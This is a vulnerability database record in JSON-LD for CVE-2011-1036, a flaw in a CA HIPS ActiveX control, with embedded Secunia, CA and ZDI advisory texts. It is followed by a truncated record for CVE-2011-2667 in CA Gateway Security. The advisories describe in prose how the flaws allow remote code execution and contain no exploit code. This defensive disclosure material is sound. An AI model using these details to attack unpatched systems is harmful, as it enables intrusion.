"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201102-0367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.1"
},
{
"model": "internet security suite 2011",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite 2010",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite 2010",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.7,
"vendor": "ca",
"version": null
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2011"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2010"
},
{
"model": "associates host-based intrusion prevention system r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:host-based_intrusion_prevention_system",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite_2010",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrea Micalizzi aka rgod",
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
],
"trust": 1.6
},
"cve": "CVE-2011-1036",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2011-1036",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2011-1036",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-48981",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-1036",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2011-1036",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2011-1036",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201102-367",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-48981",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The XML Security Database Parser class in the XMLSecDB ActiveX control in the HIPSEngine component in the Management Server before 8.1.0.88, and the client before 1.6.450, in CA Host-Based Intrusion Prevention System (HIPS) 8.1, as used in CA Internet Security Suite (ISS) 2010, allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via vectors involving the SetXml and Save methods. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The flaw exists within the XMLSecDB ActiveX control which is installed with HIPSEngine component. SetXml and Save methods are implemented insecurely and can allow creation of an arbitrary file on the victim\u0027s system. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the user. CA Host-Based Intrusion Prevention System(HIPS) is prone to a remote code-execution vulnerability. Failed exploits result in denial-of-service conditions. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:\nhttp://secunia.com/products/corporate/vim/section_179/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Host-Based Intrusion Prevention System \"XMLSecDB.DIParser\" ActiveX\nControl Vulnerability\n\nSECUNIA ADVISORY ID:\nSA43377\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43377/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43377\n\nRELEASE DATE:\n2011-03-13\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43377/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43377/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43377\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been discovered in CA Host-Based Intrusion\nPrevention System, which can be exploited by malicious people to\ncompromise a user\u0027s system. This can be exploited to create an arbitrary file\nusing directory traversal specifiers and supply controlled content\nvia the \"SetXml()\" method. \n\nThe vulnerability is confirmed in UmxXmlSd version 1.5.0.263 and\nreported in the following products:\n* HIPS Management Server versions prior to 8.1.0.88. \n\nSOLUTION:\nApply RO26950 and set registry values. Please see the vendor\u0027s\nadvisory for more details. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nAndrea Micalizzi aka rgod via ZDI\n\nAdditional details provided by Secunia Research. \n\nORIGINAL ADVISORY:\nCA (CA20110223-01):\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}\n\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-093/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nCA20110223-01: Security Notice for CA Host-Based Intrusion Prevention \nSystem\n\nIssued: February 23, 2011\nUpdated: February 24, 2011\n\n\nCA Technologies support is alerting customers to a security risk \nassociated with CA Host-Based Intrusion Prevention System (HIPS). CA Technologies has issued patches to address the \nvulnerability. \n\nThe vulnerability, CVE-2011-1036, is due to insecure method \nimplementation in the XMLSecDB ActiveX control that is utilized in CA \nHIPS components and products. \n\nHIPS client sources are vulnerable if the build number is less than \n1.6.450. \n\nOlder versions of HIPS and ISS, that are no longer supported, may also \nbe vulnerable. \n\n\nSolution\n\nCA has issued the following patches to address the vulnerability. You \ndo not need to restart the client. \n\nCA Internet Security Suite (ISS) 2010:\nFix information will be published soon. \n\nCA Internet Security Suite (ISS) 2011:\nFix information will be published soon. \n\n\nReferences\n\nCVE-2011-1036 - CA HIPS XMLSecDB ActiveX control insecure methods\n\n\nAcknowledgement\n\nAndrea Micalizzi aka rgod, via TippingPoint ZDI\n\n\nChange History\n\nVersion 1.0: Initial Release\nVersion 1.5: Added ISS 2011 to list of affected products. Added \ninstructions for determining if ISS is affected. \n\n\nIf additional information is required, please contact CA Technologies \nSupport at https://support.ca.com. \n\nIf you discover a vulnerability in a CA Technologies product, please \nreport your findings to the CA Technologies Product Vulnerability \nResponse Team. \nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nThanks and regards,\nKen Williams, Director\nca technologies Product Vulnerability Response Team\nca technologies Business Unit Operations\nwilja22@ca.com\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.9.1 (Build 287)\nCharset: utf-8\n\nwj8DBQFNZypeeSWR3+KUGYURAmbuAJ9tD5x666uOpX6ia6ksu4rdnksyggCfSwCn\nkb1ylRiLIRzRg3j1VygjImQ=\n=M+5z\n-----END PGP SIGNATURE-----\n. More\ndetails can be found at:\n\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}\n\n-- Disclosure Timeline:\n2010-08-25 - Vulnerability reported to vendor\n2011-02-23 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Andrea Micalizzi aka rgod\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-48981",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48981"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-1036",
"trust": 3.7
},
{
"db": "ZDI",
"id": "ZDI-11-093",
"trust": 3.0
},
{
"db": "BID",
"id": "46539",
"trust": 1.4
},
{
"db": "SECUNIA",
"id": "43377",
"trust": 1.3
},
{
"db": "SECUNIA",
"id": "43490",
"trust": 1.3
},
{
"db": "SECTRACK",
"id": "1025120",
"trust": 1.1
},
{
"db": "VUPEN",
"id": "ADV-2011-0496",
"trust": 1.1
},
{
"db": "SREASON",
"id": "8106",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-882",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20110223 ZDI-11-093: CA INTERNET SECURITY SUITE HIPS XML SECURITY DATABASE PARSER CLASS REMOTE CODE EXECUTION VULNERABILITY",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "16511",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "98694",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "98719",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-48981",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "99241",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "99243",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"id": "VAR-201102-0367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-48981"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T23:10:51.469000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA20110208-01: Security Advisory for CA Secure Content Manager, Gateway Security",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7B53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4%7D"
},
{
"title": "CA has issued an update to correct this vulnerability.{53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}",
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID="
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-093"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/46539"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/516649/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/516687/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7b53a608df-bfdb-4ab3-a98f-e4bb6bc7a2f4%7d"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1025120"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/43377"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/43490"
},
{
"trust": 1.1,
"url": "http://securityreason.com/securityalert/8106"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2011/0496"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/65632"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1036"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1036"
},
{
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
},
{
"trust": 0.6,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={53a608df-bfdb-4ab3-a98f-e4bb6bc7a2f4}"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/516649/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/16511"
},
{
"trust": 0.5,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-093/"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://support.microsoft.com/kb/240797"
},
{
"trust": 0.2,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.2,
"url": "http://secunia.com/products/corporate/vim/section_179/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1036"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43377/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43377/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43377"
},
{
"trust": 0.1,
"url": "https://support.ca.com."
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43490/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43490"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43490/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-02-23T00:00:00",
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"date": "2011-02-25T00:00:00",
"db": "VULHUB",
"id": "VHN-48981"
},
{
"date": "2011-02-23T00:00:00",
"db": "BID",
"id": "46539"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"date": "2011-03-14T11:36:59",
"db": "PACKETSTORM",
"id": "99241"
},
{
"date": "2011-02-25T04:53:57",
"db": "PACKETSTORM",
"id": "98719"
},
{
"date": "2011-03-14T11:37:04",
"db": "PACKETSTORM",
"id": "99243"
},
{
"date": "2011-02-24T01:23:59",
"db": "PACKETSTORM",
"id": "98694"
},
{
"date": "2011-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"date": "2011-02-25T18:00:02.167000",
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-02-23T00:00:00",
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-48981"
},
{
"date": "2011-02-25T14:28:00",
"db": "BID",
"id": "46539"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"date": "2011-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-367"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA ISS Used in CA HIPS of XML Security Database Parser class Vulnerabilities in arbitrary programs being downloaded to client machines",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "design error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
],
"trust": 0.6
}
}
VAR-201107-0229
Vulnerability from variot - Updated: 2025-04-11 22:54Icihttp.exe in CA Gateway Security for HTTP, as used in CA Gateway Security 8.1 before 8.1.0.69 and CA Total Defense r12, does not properly parse URLs, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and daemon crash) via a malformed request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Icihttp.exe module (CA Gateway Security for HTTP), which responds to incoming HTTP requests on port 8080. Due to a flawed copy-loop algorithm in the URL parsing routine, it is possible for a remote unauthenticated user to cause an exploitable heap corruption condition. This could result in the execution of arbitrary code under the context of the Gateway Security service. Computer Associates Total Defense and Gateway Security are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code with elevated privileges, completely compromising affected computers. Total Defense r12 and Gateway Security 8.1 are vulnerable; other versions may also be affected. CA has issued an update that resolves the vulnerability.
The vulnerability, CVE-2011-2667, occurs due to insufficient bounds checking that can result in a memory overwrite on the heap. By sending a malformed request, an attacker can overwrite a sensitive portion of heap memory, which can potentially result in server compromise. If the version displayed is less than 8.1.0.69, the installation is vulnerable.
Solution
Gateway Security r8.1: Apply fix RO32642
Alternatively, update to Gateway Security 9.0 available from the CA support site. (url line wraps) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782
Regards,
Kevin Kotas CA Product Vulnerability Response Team
-----BEGIN PGP SIGNATURE----- Version: PGP 8.1
